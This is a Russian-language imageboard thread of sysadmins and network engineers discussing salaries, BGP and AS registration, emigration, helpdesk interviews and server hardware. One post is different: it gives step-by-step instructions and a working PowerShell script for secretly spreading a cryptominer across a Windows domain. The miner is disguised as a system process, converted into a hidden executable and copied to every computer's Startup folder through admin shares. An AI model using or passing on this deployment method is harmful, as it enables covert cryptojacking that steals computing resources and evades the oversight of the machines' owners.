Аноним 13/12/17 Срд 20:15:45 #64 №1150319 
>>1150293
> Охуеть ядро и агрегация
Ну под ядром в крупной компании подразумевается не администрирование коммутаторов ядра, а вся центральная инфраструктура. Всё то железо, на которое завязаны все сервисы компании. Например, под этим подразумевается знание того, как и почему стек коммутаторов 4500-Х подключен к площадке Х, как и зачем подключены роутеры, которые терминируют туннели филиалов, партнеров и черт еще чего. Коммутации ЦОДа компании тоже относиться к т.н. "ядру" я бы сказал.
А само ядро кампусной сети....ну тут да, действительно. Но картина в целом выглядит уже сложнее.
Аноним 13/12/17 Срд 20:18:13 #65 №1150323 
>>1150311
>не имеет ничего общего с администрированием, веб-макакингом и кодингом.
это всё уровень техникума, Проф Тех Училища.
Аноним 13/12/17 Срд 20:26:41 #66 №1150328 
>>1150323
Сейчас набегут днари, которые четыре года грызли матан в вузе, но вкатиться смогли только в веб-программирование.
Аноним 13/12/17 Срд 20:40:49 #67 №1150347 
Расскажите про Ланит, что из себя представляет, каково работать там, как платят.
Также интересует GDC в Казани который, в инторнете про них хорошего мало пишут.
Аноним 13/12/17 Срд 21:12:59 #68 №1150371 
>>1150347
GDC ничего так, раньше было лучше, сейчас неплохо.
Аноним 13/12/17 Срд 21:45:49 #69 №1150386 
>>1150091
Ты из ДС? У нас есть позиция, где как раз нужен джун линуксоид
Аноним 13/12/17 Срд 21:53:27 #70 №1150390 
>>1150319
>Всё то железо, на которое завязаны все сервисы компании
>как и зачем подключены роутеры, которые терминируют туннели филиалов
В розетку подключены, чтобы нагревать воздух. Тунели уже школьники с компов делают безо всяких кошек.

На сетевое железо сервисы обычно завязаны примерно как на электросеть. В компаниях до 1000 рабочих мест можно всё выкинуть и заново настроить за 24 часа силами одного двух макак. Если компания большая, то макак нужно больше. Откуда ЗП по 100к у сетевых инженеров я не понимаю.
Аноним 13/12/17 Срд 21:58:35 #71 №1150392 
>>1150390
>Откуда ЗП по 100к у сетевых инженеров я не понимаю.
пффф так 100к это обычная з.п. в том то и дело.
Аноним 13/12/17 Срд 22:04:35 #72 №1150394 
>>1150392
>так 100к это обычная з.п.
Из Калифорнии капчуешь?
Судя по HH это зарплата ведущего разработчика в ДС.
Аноним 13/12/17 Срд 22:19:43 #73 №1150401 
>>1150394
я в ДС.
Инженер в нефтегазовой компании от 140 тр
Разработчик с опытом от 120 тр.
Хороший годный сетевик с опытом работы в крупной конторе уровня топ-20 банков/ритейл контор это примерно 100 на руки. За 120 можно найти, но придется поискать. За сотку прям устроишься без проблем. Это на руки.
Совокупный доход любого хорошего специалиста в ДС это сотка в месяц полюбому.
Аноним 13/12/17 Срд 22:23:23 #74 №1150404 
>>1150401
Все у вас там в ДС заебись кроме аренды.. Понту нет на 120 ехать, даже на 150 так себе, тк если тебе 150 платят и ты готов ехать, то чего бы не свинтить за бугор ?
Аноним 13/12/17 Срд 22:23:35 #75 №1150405 
то есть сетевики зарабатывают примерно как и все остальные на тех специальностях, на которых нужна какая-то квалификация.
Уровень 60-80 тр на руки в ДС это админы рабочих станций, компьютерная помощь, всякие продаваны телефонов и тому подобное. То есть те работы, где можно относительно легко обучить почти любого за приемлемый срок.
Аноним 13/12/17 Срд 22:25:57 #76 №1150408 
>>1150404
кому ты там за бугром нужен — русский Ваня — без гражданства, языка и опыта работы?!
Ты что думаешь там своих что ли нет сетевиков/кодеров/админов/любая другая профессия?
Если ты талант и самородок — это одно! Но таким у нас тоже сладко живется. В яндексах датамайнингом каким-нибудь за 200к заниматься.
Аноним 13/12/17 Срд 22:27:07 #77 №1150411 
>>1150401
>Инженер в нефтегазовой компании от 140 тр
Сколько у нас нефтегазовых компаний? В газпроме, ты хотел сказать?
>в крупной конторе уровня топ-20 банков/ритейл контор это примерно 100 на руки
В РФ 300+ CCIE. Это по 10 на топ20 банков и ритейл контор. А ещё есть 9000+ CCNP и все они получают 100+. 100к даже для ДС не "обычная зп".
Аноним 13/12/17 Срд 22:33:14 #78 №1150412 
>>1150411
Не, не газпром. Новатэк. Это газовая контора. Инженер-проектировщик опытный 150-200к. Лично общался с HR. Но это выпускники ТОп ВУЗа РГУ Нефти и Газа с богатым опытом.

Еще есть вендоры и интеграторы. Там платят побольше, чем 100. Но там уже за администрирование, а за пресейл, проектирование и тома подобное.
Аноним 13/12/17 Срд 22:34:30 #79 №1150413 
>>1150411
Как по мне, человеку, который обладает кругозором CCIE в банке делать нечего.
Аноним 13/12/17 Срд 22:35:50 #80 №1150414 
>>1150411
Говорю же, 100к для ДС для любого специалиста с опытом на работе, требующей квалификация, это уже стандарт.
Аноним 13/12/17 Срд 22:39:46 #81 №1150417 
>>1150411
Кстати, насчет зарплат. Есть же еще всякие PwC, KPMG, инвестбанкинг или как его там. Где трудятся успешные выпускники МГУ, ВШЭ и других ВУЗов из ТОП-5. Всякие консультанты BI и прочей другой херни. Там там вообще поржали бы над зарплатой в 100к. Там 100к платят стажеру. Правда хер попадешь туда и работать надо. Это не циски настраивать и групповые политики пердолить
Аноним 13/12/17 Срд 22:40:00 #82 №1150419 
Russia-Emigration-062916.png
>>1150408

Жалко что ты английский не учил
Аноним 13/12/17 Срд 23:39:24 #83 №1150443 
Вштал тут вопрош про покупку ажно целой AS для нашей компании. Я уж не знаю, чем там руководствовались топы, суть короче в том, что реализовывать всё это в конечном итоге будет Вася из ИТ. То есть я.
Собственно, мне нужны аргументы против регистрации AS.
Структура межсайтовых связей - классическая звезда VPN с ЦО в центре и филиалами/ЦОДами на лучах. По договору с разными провайдерами на каждый линк в интернет.
До этого я с BGP никогда не работал, всё пидорение сетей ограничивалось нашей внутренней AS на OSPF. Когда таки покурил пару недель различные статьи по теме понял, что так нихуя и не понял, как будут анонсироваться в интернеты линки от филиалов. Если в OSPF можно указать, что такая-то /30 подсеть из сети /28 будет анонсироваться туда-то, а другая /30 подсеть туда анонсироваться не будет. В BGP же, как я понял, анонсы во внешний мир хуярятся сразу с минимальным префиксом /24 и при том одновременно со всех наших шлюзов ведущих в Интернет.
/tl;dr/
Наверно криво объясняю, так как с терминологией не освоился ещё, да и понимание предметной области пока мутное. Короч, что я имею ввиду:
Допустим, есть у нас ЦО в Москве и филиал Чите. Их шлюзам присвоены адреса из одного и того же блока одной и той же BGP AS, к примеру, 2.2.2.0/24. У Москвы 2.2.2.1, у Читы 2.2.2.200. LAN ЦО и филиала связаны через VPN по общедоступным каналам связи; никакой своей кабельной сети между филиалом и ЦО нет.
Ну и вот, допустим, какой-то клиент из Читы решает получить доступ к официальному сайту компании, который хостится по московскому адресу 2.2.2.1. Как пойдёт пакет? Из того, что я понял, он придёт в сеть провайдера, там провайдер увидит, что данный IP пункта назначения относится к известной BGP AS, посмотрит в таблицу маршрутизации, и увидит, что ближайший к нему шлюз в эту AS находится по адресу 2.2.2.200, после чего смаршрутизирует туда пакет и... всё пойдёт прахом, потому что своей собственной кабельной структуры у нашей компании нет, а VPN быть может вообще не настроен на то, чтобы перенаправлять такую-то хуйню о внешние интернеты. Ну или там стоит сраный ЛинкСис, который вообще охуеет с такого напора.
Или я не прав?
/tl;dr Х2/
Как, короче, отдельно анонсировать префиксы /30 или /32, входящие в выделенную нам подсеть, чтобы при этом на нас весь мир не орал матом, дескать, какого хуя вы раздуваете Full View?
Аноним 13/12/17 Срд 23:40:49 #84 №1150444 
>>1150443
>входящие в выделенную нам подсеть
входящие в выделенный нам блок
Быстрофикс
Аноним 14/12/17 Чтв 00:18:52 #85 №1150459 
>>1150443
У тебя тоже 100к зп?
Аноним 14/12/17 Чтв 01:05:03 #86 №1150476 
>>1150459
Эээ, нет. 27К + двойной оклад на руки за переработки в выходные и праздники.
Аноним 14/12/17 Чтв 01:20:08 #87 №1150487 
>>1150347
GDC, или по-татарски Айсиэл сервисез, это галера. Будешь на аутсорсе обслуживать европейских заказчиков. Зарплаты средние для замкадья, причем в других подразделениях ICL (типа СТ) за те же знания и опыт можно получать больше.
Аноним 14/12/17 Чтв 01:26:06 #88 №1150489 
>>1150419
Мда... Вся жизнь в одной картинке.
Аноним 14/12/17 Чтв 07:19:51 #89 №1150504 
>>1150443
Я что-то не понял зачем тебе в филиалах компании твои провайдеронезависимые адреса?
У нас BGP с цоде, анонсируем свои PI на двух провайдеров. Все просто, схема стандартная, настройка базовая. Ничего сложного нет.
Гугли BGP для двух провайдеров, мануалов куча.
Аноним 14/12/17 Чтв 09:27:56 #90 №1150521 
Если просят проголосовать организацию на каком-нибудь сайте получается проголосовать единожды. Я ж правильно понимаю, что там проверка айпишника и невозможно сделать так чтобы каждый сотрудник проголосовал с рабочего места?
Аноним 14/12/17 Чтв 09:39:53 #91 №1150523 
>>1150521
>проверка айпишника
Ничего это не значит, может быть он записывает результат по куки, а не по IP, как люди с серыми IP голосуют, а 1 голос по IP - это безумие
Аноним 14/12/17 Чтв 09:56:35 #92 №1150524 
>>1150523
Ну я просто столкнулся с такой проблемой, что не могут люди из нашей сети голосовать. Один проголосовал, а всем другим пишут, что вы уже проголосовали - хватит. Могу я как-то это разрешить?
>по куки
Дык я бы тогда мог куки стереть и ещё голосовать. Почему тогда другим компам в сети запрещает?
Аноним 14/12/17 Чтв 10:02:44 #93 №1150526 
У меня вот вопрос. Вам удается читать литературу на работе?Или дома?И нормально ли у вас усваивается инфа если по сути приходишь домой в 7-7-30,до 8 ужинаешь а потом до 10 занимаешься?
Аноним 14/12/17 Чтв 10:11:18 #94 №1150529 
>>1150526
>У меня вот вопрос. Вам удается читать литературу на работе?
только на работе этим занимаюсь, дома редко.
На работе всеглда есть время на чтение литературы и проделывания всяких лаб в EVE-NG
Аноним 14/12/17 Чтв 10:13:53 #95 №1150530 
>>1150524
Ну у них значит по IP - это тупо

Абу банит по куки, перманентом на сутки, например, когда твой же браузер в режиме инкогнито работает
Аноним 14/12/17 Чтв 10:14:33 #96 №1150532 
>>1150529
Я пытаюсь что-то делать по вечерам,но голове уже тяжело после рабочего дня.На работе к сожалению времени нет. Надеюсь когда-нибудь появится такая работа с возможностью уделять хотя бы полтора часа в день на самообразование.
Аноним 14/12/17 Чтв 10:41:44 #97 №1150540 
>>1150529
О, а я сейчас пакет трейсер мучаю, а когда есть время катаю пару каточек в овервотч, и снова в пакет трейсер работаю админом
Аноним 14/12/17 Чтв 12:15:21 #98 №1150587 
>>1150540
на работе или дома лол? )
Аноним 14/12/17 Чтв 12:24:05 #99 №1150595 
>>1150526
> У меня вот вопрос. Вам удается читать литературу на работе?Или дома?И нормально ли у вас усваивается инфа если по сути приходишь домой в 7-7-30,до 8 ужинаешь а потом до 10 занимаешься?
Попытки заниматься этим дома после работы длительное время быстро проведут тебя к проф выгоранию.
Аноним 14/12/17 Чтв 12:34:14 #100 №1150599 
>>1150587
На работе, дома я не могу, дома я занят
Аноним 14/12/17 Чтв 12:44:15 #101 №1150605 
Как можно с минимумом затрат сделать переадресацию с одного телефона на другой? Телефоны обычные аналоговые и функции они такой не поддерживают. Линии разные.
Аноним 14/12/17 Чтв 12:46:33 #102 №1150607 
>>1150605
https://help.mgts.ru/home/phone/forwarding/

Кто оператор? Туда и вопросы, вопрос в поддержке АТСа
Аноним 14/12/17 Чтв 22:44:41 #103 №1150902 
фух, переименовали
Аноним 15/12/17 Птн 09:37:50 #104 №1151042 
15114389604070.jpg
Сетевики, а как мой провайдер организует работу интернета у меня дома, у меня нет привязки по маку, пппое, или ещё какой говнины, я просто втыкаю провод и получаю интернет с белым IP по DHCP от провайдера
Аноним 15/12/17 Птн 10:46:33 #105 №1151055 
15117869753720.png
Катал это всё для /cc/, о том как заразить ПК в домене майнером, что бы не зря катал вброшу сюда, может кому-то понадобится:

1 качаешь консольный майнер майнергейта, его так как не детектируется антивирусом: https://minergate.com/downloads/console
2. переименовываешь его .exe в что-то более-менее похожее на процесс винды, например system86
3. создаешь батник загрузки майнера и пишешь туда: "system86 -user youremail@account -xmr 1", где -xmr, то что майним, цифра "1" - потоки процессора, ты сказал про 80%, вот если у тебя 4 ядра, то бери цифру 3, ну сам подгонишь system86 -имя твоего переименованного exe файла
4. чтобы не палиться качаешь прогу, называется bat to exe, и конверитурешь свой bat в СКРЫТЫЙ exe файл без ГУИ
5. создаёшь ярлык для автозапуска файла при старте системы, назови его также system86.lnk, в нём указывай путь на скрытый ехе "C:\ProgramData\system86\test.exe"
6. создаём сетевую папку с правами "чтение для всех", папка будет, например "\\SMBshara\miner\"и кидаем туда наш ярлык и папку с майнером
7. Я уже постарался и сделал скрипт для разливки на ПК в домене:
#начало мы выгружаем все ПК из OU
$ErrorActionPreference = "SilentlyContinue"
$strCategory = "computer"
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = "LDAP://OU=SERVERS,DC=COMPANY,DC=local"
$objSearcher.Filter = ("(objectCategory=$strCategory)")
$colProplist = "name"
foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$colResults = $objSearcher.FindAll()
#тут мы перебираем все ПК по циклу пк1-пк2-пк3 итд
foreach ($objResult in $colResults)
{
$objComputer = $objResult.Properties
$objComputer.name
#тут мы задаём пути КУДА скопировать майнер, я бы не брал папку windows так как из неё нихера не запускается
$path1="\\"+$objComputer.name+"\C$\ProgramData\system86"
#эта папка АВТОЗАГРУЗКИ для всех пользователей windows, запускается при старте системы
$path2="\\"+$objComputer.name+"\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\"
#тут мы показываем что и куда копировать
Copy-Item -ErrorAction SilentlyContinue -Path "\\SMBshara\miner\system86\" -Destination "$path1" -Recurse
Copy-Item -ErrorAction SilentlyContinue "\\SMBshara\miner\system86.lnk" -Destination "$path2"
}
Ну без прав админа ты не сможешь это разлить удалённом, можешь конечно кидать руками
Аноним 15/12/17 Птн 12:05:52 #106 №1151077 
>>1151042
Вариант 1: ты доплачиваешь провайдеру 50₽ в месяц за белый IP, просто не знаешь об этом.
Вариант 2: твой IP не совсем белый.
Аноним 15/12/17 Птн 12:15:37 #107 №1151084 
>>1151077
Да, белый, белый, доступен из внешнего мира
Вопрос не про IP, а про то какими средствами и как он это реализует, без привязок и прочей хуйни
Аноним 15/12/17 Птн 12:22:58 #108 №1151086 
>>1151084
> Да, белый, белый, доступен из внешнего мира
> Вопрос не про IP, а про то какими средствами и как он это реализует, без привязок и прочей хуйни
Dhcp option 82 вроде бы. Передаёт на dhcp сервер идентификатор коммутатора и номер порта.
Аноним 15/12/17 Птн 12:23:15 #109 №1151088 
>>1151042
IPoE
Аноним 15/12/17 Птн 12:42:43 #110 №1151098 
>>1151088
>>1151086
https://habrahabr.ru/post/108453/

Во, нашёл, отлично
Аноним 15/12/17 Птн 14:19:48 #111 №1151149 
У меня два вопроса про IP-KVM (IPMI, Supermicro, на понты денег нет).
1. Там есть интеграция с Active Directory, точно есть. А Single Sign On работает? //Это я и сам могу проверить, но если кто знает - хорошо, меньше глупых и бесплодных попыток.
2. Предположим, привезли новый, чистый, голый сервер. Нам известны его GUID, MAC-адреса каждой сетевой карты, включая KVM-ную. Все. В принципе, достаточно. Адреса со всеми настройками сети выдать везде, в т.ч. на KVM-порту - не вопрос. Установить ОС как надо, из шаблона и с Desired State Configuration по сети - не вопрос. А автоматизировать настройку всякой херни, включая доменную авторизацию пользователей IPMI - можно? //Это я проверить не могу, не на чем. Не сносить же один из серваков подчистую для дурацкого эксперимента? Так, на будущее интересуюсь.
Аноним 15/12/17 Птн 14:43:52 #112 №1151164 
>>1150487
>Будешь на аутсорсе обслуживать европейских заказчиков.
Это охуенно же. Богатая инфраструктура с нормальными серверами и оборудованием, от сотни до нескольких тысяч серверов у клиентов, десятки тысяч пользователей, иностранные коллеги, прокачиваешь английский, командировки в Европу.
> ...
> эмигрируешь
> PROFIT
Аноним 15/12/17 Птн 14:54:48 #113 №1151168 
>>1151164
Правда скучновато, я понимаю, что российский маня бизнес - это хуёво, но только в рашке у нас и линукс и сети и виндувс и БД и всё делает один человек, а в Европе под каждый пук отдельный
Аноним 15/12/17 Птн 14:56:14 #114 №1151169 
>>1151164
>>1151168
>только в рашке у нас и линукс и сети и виндувс и БД и всё делает один человек
В любой мало мальски крупной компании не так.
Аноним 15/12/17 Птн 14:58:57 #115 №1151173 
>>1151169
>мальски крупной компании не так.
Знаю, но не всегда, в конторе из 5-6 ойтишников на 500 человек (что считается нормой) будет 3-4 эникея и 2-3 Шивы, которые будут делать всё
Работаю в ИБ в конторе с 6к пользователей, так я и линукса настраиваю и энтерпрайз админ, и запросы к ексчейндж пишу на повершелл, в общем тоже Шива
Аноним 15/12/17 Птн 15:02:38 #116 №1151176 
>>1151173
>Работаю в ИБ в конторе с 6к пользователей так я и линукса настраиваю и энтерпрайз админ, и запросы к ексчейндж пишу на повершелл, в общем тоже Шива
это очень странное положение вещей.
У нас ИБ это ИБ, виндоадмины это виндоадмины, сетевики это сентевики, телефонисты тоже отдельно.
эникеи отдельно. Базы данных отдельно. Разработка отдельно.
Аноним 15/12/17 Птн 15:11:34 #117 №1151181 
>>1151149
>А автоматизировать настройку всякой херни
>Адреса со всеми настройками сети выдать везде, в т.ч. на KVM
This. Раз адрес выдается, а не вписывается, он тебе известен. Дальше командуй ему че хошь с дефолтным паролем.
Аноним 15/12/17 Птн 15:18:26 #118 №1151186 
>>1151176
У нас также, но когда ты оказываешься более квалифицированным, чем отдел линуксойдов у аутсорса, то невольно начинаешь делать сам, аналогично с виндой, я могу написать скрипт на повершелл сам, а могу попросить виндузятника, но в первом случае я понимаю, что я делаю и что получу
Друзья ИБшники такие же, один настраивает циски, имеет CCNA, хотя с знаниями CCNP, а всё ещё тоже безопасник, другой тоже безопасник, а занимается пентестами, и логично занимается хацканьем чужих сетей используя свои знания
Если ваши безопасники только могут катать писули - они тупые
Аноним 15/12/17 Птн 15:24:21 #119 №1151191 
>>1151186
это те друзья, которым платят по 200 тысяч в месяц?
Аноним 15/12/17 Птн 15:47:18 #120 №1151195 
>>1151191
Ага
Аноним 15/12/17 Птн 16:07:15 #121 №1151199 
>>1151195
ну так это получается ты линукса настраиваешь и винду админишь не с подачи руководства, а исходя из того, что тебе самому так хочется, как я понял. А так у тебя есть в конторе и сетевики, и админы.

У нас, например, ИБ только мониторингом занимаются и бумажными делами. Циски и линукса не настраивают и не лезут туда.
Аноним 15/12/17 Птн 16:28:34 #122 №1151215 
>>1151199
>бумажными делами
Да это пиздец как скучно
И вообще я думаю, что пора бы эту работу уже дропать, так как полное говно
Аноним 15/12/17 Птн 16:29:44 #123 №1151218 
>>1151215
>И вообще я думаю, что пора бы эту работу уже дропать, так как полное говно
Кем собираешься идти?
Аноним 15/12/17 Птн 16:55:17 #124 №1151234 
>>1151218
В ойти вернусь, или в ИТ ИБ с пентестами, хацканьем и подобным, может в ITSM подамся, но уж точно сидеть и весь день торговать ебалом в DLP не буду
Плюс ойтишной работы - весело, железки, спуфинг, сидишь как свинья грязный по уши в шеллах, сел в 10 утра, а встал уже за полночь
Плюс манагерской работы - есть свободное время, сказал, что на встречу и съебался по своим делам или домой я так три года на встречи ездил, кек. Построил поддержку, и начал сам себе планы на год рисовать, никто не понимает, какую хуйню ты делаешь, что умные цели, на деле довольно простые, и реализуются по щелчку пальцев, нарисовал время выполнение заявки 30 минут, а на деле там и 2 минутами не пахнет, и снижай по 2-3-4 минуты раз в два года, а всё оптимизация, а потом сделаешь продление сертификата для сайта и почты по акции, А сам пишешь "оптимизация расходов выделяемых на конфиденциальность приватности данных" или вместо ИТ отдел писать "отдел инфраструктуры внутреннего ИТ развития", ох бля, короче я веселился, когда руководил своим ИТ отделом в одной параше, да, может обратно в руководители ИТ отдела попробую податься
Аноним 15/12/17 Птн 23:50:03 #125 №1151445 
>>1149761 (OP)
В конфу в телеге чет не добавили.

Быстрый вопрос.

Есть публичный ключ ссх. Нужно сделать его сесурно нерабочим, оставив в контенте ключа в начале "ssh-rsa ...."

Рабочий ли вариант "ssh-rsa NOKEY"
Аноним 16/12/17 Суб 05:03:51 #126 №1151488 
>>1151234
Скоро окажешься у разбитого корыта.
Хотя я считаю что ты просто пиздобол.
Аноним 16/12/17 Суб 11:04:25 #127 №1151529 
Есть одна мать. Корпус 2U, охлаждение - кассета из 3-х вентиляторов 80мм. Разъемы 1-4,A,B справа налево, подключены 1,2,A.
Фены 1 и 2 дуют на процы и память, фен А - на чипсет.
Так вот, вентилятор на разъеме 1 не то чтоб вразнос, но крутится на полных оборотах. В то время как вентилятор на разъеме 2 показывает от силы 2000. Есть четыре режима работы.
Full Speed: F1 - 6.9K, F2, FA - 7.1...7.2K
Standard Speed: F1 - 7.1...7.2K, F2 - 2.2K, FA - 3K
Optimal Speed: F1 - 7.2K, F2 - 1.8K, FA - 3.1K
Heavy I/O: F1 - 7.1...7.2K, F2 - 1.6K, FA - 6.1K (ну понятно, за чипсет он один в ответе).
Для сравнения, на втором таком же серваке все трое работают более-менее на равных оборотах. Регуляторы оборотов внутренние. Я только что поменял местами F1 и F2, картина та же, первый разъем на полную, второй сачкует. Нет, подключение кассеты правильное, при изъятии F1 датчик показывал, что изъят именно F1, для F2 - соответственно, F2.
Что может быть? Термодатчик для F2 мозги ебет?
Аноним 16/12/17 Суб 11:17:03 #128 №1151538 
>>1151529
>Термодатчик
Опять же, температура процов, памяти, чипсета адекватная и на обоих более-менее одинаковая. Так что термодатчик-то в норме, скорее всего.
А как должен вести себя регулятор оборотов, если сигнал от термометра на него не поступает или поступает с помехами? Может, криворукие сборщики при установке кассеты одну из жилок перебили?
Аноним 16/12/17 Суб 12:32:32 #129 №1151566 
>>1151538
Надо будет остановить, да кассету на другие разъемы подключить. Если что-то изменится, значит, с термодатчика лажа идет. Если не изменится - значит, где-то кабель поврежден.
 Аноним 17/12/17 Вск 15:23:23 #130 №1151965 
>>1151538
а еще может радиатор не плотно сидит на проце. Проц греется и на фене максимум. Проверить модно тонким слоем термопасты на касание.
Аноним 18/12/17 Пнд 05:00:08 #131 №1152271 
>>1150408
"Кому ты там нужен?" - неправильная постановка вопроса. В России вы тоже не особо кому-то нужны. Чувствуешь в себе силу и уверен в себе - езжай. Вот и все. Если иметь за бугром статус разрешающий работать - безработным не останешься.
Аноним 18/12/17 Пнд 08:05:29 #132 №1152296 
>>1152271
>Если иметь за бугром статус разрешающий работать - безработным не останешься.
Вопрос, откуда ты возьмешь такой статус?
Аноним 18/12/17 Пнд 08:28:49 #133 №1152299 
>>1152296
Канада. Австралия. Можно просто приехать по программе, если заморочиться с подтверждением опыта и сдачей экзаменов по языку. США - пока есть лотерея. Ну и просто рабочие визы и собеседования никто не отменял.
Аноним 18/12/17 Пнд 08:39:33 #134 №1152301 
>>1151965
Может быть. Но а)>>1151538
>температура процов, памяти, чипсета адекватная и на обоих (серваках) более-менее одинаковая
Если судить все по той же сводке с датчиков, там 33...35 градусов. Что, в общем, не показатель, температура как раз может и удерживаться только потому что первый фен все время на полных оборотах.
б) Каждый из фенов на "цифровых" разъемах дует сразу на оба проца.
в) Судя по мануалу, в секции "Установка радиаторов" с термопастой экспериментировать вообще запрещено. Так и сказано, мол, пленочку с подошвы сняли - и сразу ставьте, там намазано столько, сколько нужно.
Аноним 18/12/17 Пнд 09:03:10 #135 №1152312 
>>1152299
>Ну и просто рабочие визы и собеседования никто не отменял
Вопрос: ты обладаешь такой квалификацией, чтобы американский работодатель станет заморачиваться ради того, чтобы нанять такого специалиста, как ты? При этом у него будет понимание, что на своем рынке такого специалиста найти сложно. Ответь.
Аноним 18/12/17 Пнд 09:13:17 #136 №1152318 
>>1151488
why?
а ты думаешь, как оно работает, никто на самом деле ничего не знает, процесс выстраивается сам собой за пару месяцев
Аноним 18/12/17 Пнд 09:16:11 #137 №1152319 
>>1151445
>сесурно нерабочим
Поясняй вопрос, что это значит
Если это публичный ключ, то нерабочий это значит, что бы его не мог открыть закрытый? То есть достаточно подменить ключ? Но тогда он не будет подписан закрытым ключом.
Если ты удалишь или изменишь хоть один символ ключа, то будет отличается его HMAC если я верно помню название чексуммы
Поэтому поясняй что хочешь и куда сделать
Аноним 18/12/17 Пнд 11:28:53 #138 №1152369 
>>1149761 (OP)
Какие вопросы обычно задают на интервью с хелпдеском?
Аноним 18/12/17 Пнд 11:34:45 #139 №1152374 
>>1152369
Могут какую угодно хуйню и чушь спросить
"Типа мне вчера настроили доступ на удаленную шару, а сегодня не работает, что за хуйня" - да иди нахуй пидрила, свечку не держал, могу настроить только нормально занова.
Аноним 18/12/17 Пнд 11:36:14 #140 №1152377 
>>1152369
Ты хочешь пойти на обычную первую линию поддержки пользователя? Поддержка по телефону, дистанционная или принять заявку и подойти?

Если ты про HD эникейный, то общие вопросы - что такое DHCP, что такое Proxy, что такое DNS, VPN
Почему может не работать интернет, типы IP адресов (белый, серый (192.168/16 172.16/12 10.0/8), 169.254/8 - линклокал и локалхост 127.0/8)
что такое маска подсети и для чего нужна, вряд ли попросят её рассчитать, но можешь глянуть
основные команды в windows - ping, tracert, ipconfig
Ну и модель оси, просто иметь представление

Это наверное минимальный набор техпода

Давай подробнее куда идёшь и на какой техпод, и я тебе подробнее распишу
Аноним 18/12/17 Пнд 11:44:25 #141 №1152380 
>>1152377
Первая линия, по телефону.
Иду в компанию у которой своё йоба ПО и которая обслуживает клиентов этого ПО за ПО сказали похуй, с ним обращаться научат. Главное уметь в обслуживание офисной техники и вот этого всего
Аноним 18/12/17 Пнд 11:59:13 #142 №1152386 
>>1152380
А, ну смотря какое ПО и с чем оно работает, если как-то связано с настройками интернета, тогда то, что я писал выше, если один-эсс, тогда могут спросить про то как будите удалённо подключаться, что такое IP адрес, что такое HOSTNAME
Могут дать задачку:
Как с ПК1 подключиться к ПК2, если ПК1 192.168.1.10/24, а ПК2 192.168.2.10/24 - ответ типа сделать пинг, или попробовать по SMB (\\192.168.2.19), если пинга и подключения нет, при этом ПК1 в сети и сеть видит, то отправить вопрос самому заказчику, чтобы обеспечил доступ/маршрутизацию до ПК

Какие требования у работодателя, ты хоть перечень напиши, что у них в поиске соискателя написано
 Аноним 18/12/17 Пнд 15:45:51 #143 №1152549 
>>1152301
Я это к тому что говорилось о неких сборщиках до этого. Мало ли.
Ну тогда вообще-то это может быть из-за недостаточной мощности БП. Неправильно рассчитана.
А еще может так быть с наступлением холодов электросеть не выполняет договор и поставляет электричество с заниженным напряжением. Мой рекорд- 150 В. Ниже уже идет постоянная перезагрузка.
Аноним 18/12/17 Пнд 15:57:12 #144 №1152554 
>>1152380
Veeam?
Аноним 19/12/17 Втр 07:55:58 #145 №1152745 
>>1152549
>Мало ли
А, ну так с процом ошибиться сложно, разве что очень сильный дядька попадется и вкорячит его поперек сокета. А с кассетой легко, там только внутри все чисто, чтоб анус фены можно было на ходу дергать. А снаружи торчат обычные тоненькие кабели из четырех жил. Защемили один такой между кассетой и матерью и привет. А то что сразу не заметили - ну, бывает. При старте-то они минут пять ревут как "штука" в пикировании, пока post проходит. На каникулах уже покопаюсь. Обороты штатные, людей там все равно нет, на уши давить некому.
Аноним 19/12/17 Втр 17:52:58 #146 №1152928 
>>1152312
В принципе, да. Незаменимых, конечно, нет. Но у меня довольно высокая квалификация. Разумеется, из Индии привезти человека проще, но шансы есть всегда.
Аноним 19/12/17 Втр 18:09:25 #147 №1152941 
Ну чё, бекоины продали?
Аноним 19/12/17 Втр 23:13:45 #148 №1153117 
ZfqmFfN.jpg
Cпецы, дайте лайвхак:

Что говорить техподдержке провайдера чуваку, чтобы он понял, что ему звонит не Антон Уральский, что у меня реально проблемы с интернетом, и что я уже включал и выключал роутер.
Аноним 19/12/17 Втр 23:37:27 #149 №1153149 
>>1153117
авторизайшен фейл сервер не доступен
Аноним 19/12/17 Втр 23:39:07 #150 №1153151 
так и говори
Аноним 20/12/17 Срд 01:11:42 #151 №1153218 
>>1153117
Я говорю состояние индикаторов подключения кабелей, есть ли связь до основного шлюза, ешё говорю что пробовал выходить на связь что через маршрутизатор, что с напрямую подключенным к компу кабелем. Перед этим на всякий случай пингую 8.8.8.8 и kremlin.ru


Аноним 20/12/17 Срд 09:54:11 #152 №1153302 
>>1153117
Когда я начинал работать с техпода провайдера, то обычно шарящие чуваки говорили: у меня не работает интернет, не идёт/идёт пинг до туда, пингую по IP, с двух+ устройств, антивирус выключен, пробовал напрямую, аплинк до вашего коммутатора есть
Аноним 20/12/17 Срд 12:00:49 #153 №1153374 
>>1152928
>В принципе, да.
Что ты такое делаешь?
Кардиохирург что ли?
Разработчик топовый с математическим образованием?
Аноним 20/12/17 Срд 12:26:59 #154 №1153382 
>>1153374
>Кардиохирург
В Штатах Обама убил элитность профессии врача - зарплата упала в разы и очень многие разъехались по домам.

>>1153374
>Что ты такое делаешь?
Какой-нибудь специалист по машинному обучению с красным дипломом Мехмата - их в Яндексе много и почти все со временем уезжают за бугор.

мимо проходил
Аноним 20/12/17 Срд 12:28:21 #155 №1153384 
>>1153382
>Какой-нибудь специалист по машинному обучению с красным дипломом Мехмата - их в Яндексе много и почти все со временем уезжают за бугор.
Аааа ну если тот анон такой, то Welcome to USA, но почему-то у меня сомнения.
Аноним 20/12/17 Срд 12:32:21 #156 №1153388 
15131940003340.png
>>1153384
На самом деле уехать просто, если у тебя свободный английский и нет родственников, которых надо содержать. Просто ищешь работу за бугром, также как и на hh.ru проходишь сначала удаленное собеседование, потом один раз - очное. Конечно, выбор вакансий меньше, а требования выше, т.к. ты будешь обходиться компании дороже, но не настолько выше, чтобы у среднего админа не было никаких шансов. Гораздо чаще всё упирается в язык/семью...
Аноним 20/12/17 Срд 12:35:00 #157 №1153389 
>>1153388
А есть ли смысл быть админом мигрантом-таджиком там, если можно сидеть в ДС в России и иметь примерно тот же уровень жизни?
Аноним 20/12/17 Срд 12:55:11 #158 №1153394 
>>1153389
